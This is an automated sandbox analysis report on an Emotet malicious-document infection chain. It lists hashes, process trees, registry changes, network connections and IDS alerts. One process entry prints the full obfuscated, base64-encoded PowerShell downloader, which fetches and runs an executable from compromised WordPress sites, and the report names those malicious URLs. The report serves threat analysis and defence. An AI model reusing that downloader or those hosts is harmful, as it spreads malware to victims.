URL:

https://atributikospartneris.lt/wp-content/sites/

Full analysis: https://app.any.run/tasks/8daf3b9f-73a0-4f05-aa07-5e9ba158b0a4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 08:43:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MD5:

D1AD3E18A90CA1DCE6C4D1BC09C675A6

SHA1:

AC9A6051B2D6D76F1C5E67B033D798922E0CAA73

SHA256:

D70B70AEB0E0410A0F6147652CCC9A29A59BA7FE7508A53C97638A0F8143E637

SSDEEP:

3:N8sMz3izK/dlAQLRmn:2sM7izKlAQcn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • R0cx8yuqw.exe (PID: 3452)
    • Downloads executable files from the Internet

      • POwersheLL.exe (PID: 3252)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 3688)
      • WINWORD.EXE (PID: 3612)
    • Application launched itself

      • WINWORD.EXE (PID: 3612)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3252)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 3252)
    • Executable content was dropped or overwritten

      • R0cx8yuqw.exe (PID: 3452)
      • POwersheLL.exe (PID: 3252)
    • Executed via WMI

      • POwersheLL.exe (PID: 3252)
  • INFO

    • Application launched itself

      • chrome.exe (PID: 3688)
    • Reads the hosts file

      • chrome.exe (PID: 3688)
      • chrome.exe (PID: 3984)
    • Reads settings of System Certificates

      • chrome.exe (PID: 3984)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3612)
      • WINWORD.EXE (PID: 3632)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 3688)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3612)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
13
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs chrome.exe no specs powershell.exe r0cx8yuqw.exe

Process information

PID
CMD
Path
Indicators
Parent process
272"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,14224036988520719643,15519380759851094362,131072 --enable-features=PasswordImport --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=753646557557338142 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2456 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
1488"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=612 --on-initialized-event-handle=324 --parent-handle=328 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
2224"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6f15a9d0,0x6f15a9e0,0x6f15a9ecC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
2412"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,14224036988520719643,15519380759851094362,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16907182011140164707 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2196 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
2548"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,14224036988520719643,15519380759851094362,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=7983203255199449450 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2176 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
2920"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,14224036988520719643,15519380759851094362,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15876999996731691284 --mojo-platform-channel-handle=1052 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
3252POwersheLL -ENCOD JABEAGwAOAB6ADgAdQBvAD0AKAAoACcARAAnACsAJwAyAHIAYgAnACkAKwAnAHUAJwArACcANgBqACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBTAEUAcgBQAHIAbwBmAEkAbABFAFwAUAB1AHkAawBJADAAbABcAEQAegBLAG0ANQAzAGkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBDAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAVQByAEkAdABZAFAAcgBvAFQAYABPAGMATwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKQArACcALAAgACcAKwAoACcAdAAnACsAJwBsAHMAMQAxACwAIAAnACkAKwAoACcAdAAnACsAJwBsAHMAJwApACkAOwAkAEoAbABnAG4AdwBnAHEAIAA9ACAAKAAnAFIAMAAnACsAKAAnAGMAJwArACcAeAA4AHkAJwApACsAKAAnAHUAcQAnACsAJwB3ACcAKQApADsAJABGAHkAcwA0ADQAdwBkAD0AKAAnAEYAJwArACcAawAnACsAKAAnAGoAJwArACcAMgBrAGEAZgAnACkAKQA7ACQASwA4AGoAbQBtADMAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ACcAKwAnADAAfQAnACsAKAAnAFAAdQAnACsAJwB5AGsAaQAwAGwAJwApACsAJwB7ACcAKwAnADAAJwArACcAfQBEACcAKwAoACcAegAnACsAJwBrAG0ANQAnACkAKwAnADMAaQB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAEEAUgBdADkAMgApACsAJABKAGwAZwBuAHcAZwBxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABFAHIAcwBqAF8AawBwAD0AKAAnAFIAJwArACgAJwA3ADEAdwB0ACcAKwAnAHIAMgAnACkAKQA7ACQAWgBkAGQAbQB3AGcANwA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBFAG4AdAA7ACQARABqAG4ANgBtADIAaAA9ACgAJwBoACcAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAvAC8AZAAnACsAJwBhAHQAJwApACsAKAAnAHYAJwArACcAaQBlAHQAcQAnACkAKwAoACcAdQBhACcAKwAnAG4AJwApACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAJwArACcAbgB0AC8AJwApACsAJwB3AHIAJwArACcAYQA2ACcAKwAnAEsAJwArACcALwAqACcAKwAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AJwApACsAJwBhACcAKwAoACcAbABiAGEAcwBpAHMAZwByACcAKwAnAG8AJwApACsAJwB1AHAAJwArACgAJwAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAHcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AdAAnACsAJwBlACcAKwAnAG4AJwArACcAdAAvACcAKwAoACcASAAvACcAKwAnACoAaAB0AHQAJwArACcAcAA6ACcAKQArACgAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcALgAnACkAKwAoACcAYQBzAG0AYQAnACsAJwByAGEAJwApACsAKAAnAGwAJwArACcAbwBrAGEALgAnACsAJwBjACcAKQArACcAbwAnACsAKAAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AaQAnACsAJwBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzAC8AcgAnACkAKwAoACcAYQAnACsAJwA1AGQAJwApACsAKAAnAC8AKgAnACsAJwBoAHQAJwArACcAdABwADoALwAvACcAKQArACgAJwB0ACcAKwAnAGgAYQBuACcAKQArACcAaAB0ACcAKwAnAGgAJwArACcAYQB0ACcAKwAoACcAYgBhAGQAaQBuACcAKwAnAGgAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAJwAvAG8AJwArACcAbAAnACsAJwA1ACcAKwAnAGEAJwArACgAJwB1AHoALwBBACcAKwAnAFEALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AeQAnACsAJwBwACcAKQArACcAZABkACcAKwAnAGYAJwArACcALgAnACsAJwBvACcAKwAoACcAcgBnACcAKwAnAC8AZQBuAC8AJwApACsAKAAnAE4AUgAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwADoAJwArACgAJwAvAC8AcwB1AGIAcgAnACsAJwBhAG0AJwArACcAYQAnACsAJwBuAHkAJwArACcAYQB0AGUAbQBwACcAKQArACcAbAAnACsAKAAnAGUALgAnACsAJwBvACcAKQArACgAJwByAGcAJwArACcALwBjAGcAJwApACsAJwBpACcAKwAoACcALQBiAGkAJwArACcAbgAnACsAJwAvADAAZQBCAEsATwAvACcAKQArACgAJwAqACcAKwAnAGgAdAAnACsAJwB0AHAAcwA6AC8AJwApACsAJwAvACcAKwAnAGQAYQAnACsAJwBpACcAKwAoACcAcwB5AGIAbwBvAHQAJwArACcAcwAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8ALgAnACkAKwAnAHUAawAnACsAKAAnAC8AdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACsAJwAvAHUALwAnACkAKQAuACIAcwBQAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABDAGgAbgAyADcAbAAwAD0AKAAnAFkAJwArACgAJwA0ACcAKwAnAHgAMAB6ACcAKQArACcAOAB5ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEQAZABmAHkAZwB1ADAAIABpAG4AIAAkAEQAagBuADYAbQAyAGgAKQB7AHQAcgB5AHsAJABaAGQAZABtAHcAZwA3AC4AIgBEAG8AYAB3AGAATgBsAG8AQQBEAGYAYABpAGwARQAiACgAJABEAGQAZgB5AGcAdQAwACwAIAAkAEsAOABqAG0AbQAzAGYAKQA7ACQATQB3AHMAZAA5AG0AMgA9ACgAKAAnAEcAJwArACcAZwBlADkAJwApACsAKAAnADgAcgAnACsAJwBpACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEsAOABqAG0AbQAzAGYAKQAuACIAbABgAEUAbgBHAFQAaAAiACAALQBnAGUAIAAzADUAMQA1ADUAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwAnACsAJwBrAGUALQBJAHQAZQBtACcAKQAoACQASwA4AGoAbQBtADMAZgApADsAJABVAHkAYwB5AHAAbwA2AD0AKAAnAFEAJwArACgAJwBsACcAKwAnAGgAeAAnACkAKwAoACcAcQAnACsAJwB3ADMAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAZgA4ADAAeQB0ADEAPQAoACcATAAnACsAJwByACcAKwAoACcAMQBoACcAKwAnAGEAMAByACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABXAHEAOABpAHcAbgBiAD0AKAAnAFEAdQAnACsAJwBsACcAKwAoACcAYgB1AGsAJwArACcANAAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3324"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,14224036988520719643,15519380759851094362,131072 --enable-features=PasswordImport --disable-gpu-sandbox --use-gl=disabled --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=1942496608170871423 --mojo-platform-channel-handle=1508 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
3452"C:\Users\admin\Puyki0l\Dzkm53i\R0cx8yuqw.exe" C:\Users\admin\Puyki0l\Dzkm53i\R0cx8yuqw.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
Modules
Images
c:\users\admin\puyki0l\dzkm53i\r0cx8yuqw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
3612"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\BAL_WW0832350807KS.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
Total events
3 233
Read events
2 654
Write events
371
Delete events
208

Modification events

(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
01000000
(PID) Process:(1488) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
Operation:writeName:3688-13245929010279125
Value:
259
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:dr
Value:
1
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome
Operation:writeName:UsageStatsInSample
Value:
0
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
Operation:delete valueName:3228-13245745346152343
Value:
0
(PID) Process:(3688) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
Operation:delete valueName:3688-13245929010279125
Value:
259
Executable files
2
Suspicious files
19
Text files
64
Unknown types
8

Dropped files

PID
Process
Filename
Type
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F744532-E68.pma
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\127dcda0-5cb9-4a44-8618-dcaad823057e.tmp
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000046.dbtmp
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.oldtext
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old~RF3ba5a7.TMPtext
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF3ba5a7.TMPtext
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old~RF3ba633.TMPtext
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.oldtext
MD5:
SHA256:
3688chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.oldtext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
11
DNS requests
6
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3252
POwersheLL.exe
GET
200
103.97.125.60:80
http://datvietquan.com/wp-content/wra6K/
VN
executable
400 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3984
chrome.exe
172.217.22.99:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3984
chrome.exe
46.17.175.20:443
atributikospartneris.lt
unknown
3984
chrome.exe
142.250.74.205:443
accounts.google.com
Google Inc.
US
whitelisted
3984
chrome.exe
172.217.22.67:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3252
POwersheLL.exe
103.97.125.60:80
datvietquan.com
VN
suspicious
3984
chrome.exe
172.217.16.206:443
sb-ssl.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.22.99
whitelisted
atributikospartneris.lt
  • 46.17.175.20
unknown
accounts.google.com
  • 142.250.74.205
shared
sb-ssl.google.com
  • 172.217.16.206
whitelisted
ssl.gstatic.com
  • 172.217.22.67
whitelisted
datvietquan.com
  • 103.97.125.60
suspicious

Threats

PID
Process
Class
Message
3252
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3252
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3252
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info